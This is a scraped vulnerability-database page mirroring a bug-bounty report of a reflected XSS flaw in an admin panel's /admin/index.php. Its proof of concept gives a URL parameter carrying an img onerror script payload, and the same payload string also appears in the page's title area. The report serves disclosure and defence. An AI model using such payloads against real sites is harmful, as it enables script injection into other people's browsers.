<img src/onerror="alert('XSS')3. Step 3: Detec...">Reflected XSS in /admin/index.php - vulnerability database | Vulners.com<img src/onerror="alert('XSS')3. Step 3: Detec..."><img src/onerror="alert('XSS')3. Step 3: Detec..."><img src/onerror="alert('XSS')3. Step 3: Detec...">

Lucene search

K

NgductungFBFD4E84-61FB-4063-8F11-15877B8C1F6F

HistorySep 30, 2023 - 6:39 a.m.

Reflected XSS in /admin/index.php

2023-09-3006:39:57

ngductung

www.huntr.dev

6

website security

xss

proof of concept

video poc

bug bounty

admin panel

7.2 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

Description

Description I noticed, your website is very secure. But you overlooked a flaw XSS

Proof of Concept

Step 1: Access the demo website
Step 2: Access admin/index.php?action=ngductung"><img><img src/onerror="alert('XSS')
Step 3: Detect XSS

Video PoC

https://ngductung-my.sharepoint.com/:v:/g/personal/ngductung_ngductung_id_vn/EcbTzZBsrXZBuZdf2aScnQ0BOWeP44cBiTwnpDIoV79aOQ?nav=eyJyZWZlcnJhbEluZm8iOnsicmVmZXJyYWxBcHAiOiJPbmVEcml2ZUZvckJ1c2luZXNzIiwicmVmZXJyYWxBcHBQbGF0Zm9ybSI6IldlYiIsInJlZmVycmFsTW9kZSI6InZpZXciLCJyZWZlcnJhbFZpZXciOiJNeUZpbGVzTGlua0RpcmVjdCJ9fQ&e=Zqdo9L

7.2 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

Related for FBFD4E84-61FB-4063-8F11-15877B8C1F6F

osv2 veracode1 prion1 cnvd1 github1 cve1 cvelist1 nvd1 nessus1 freebsd1 openvas1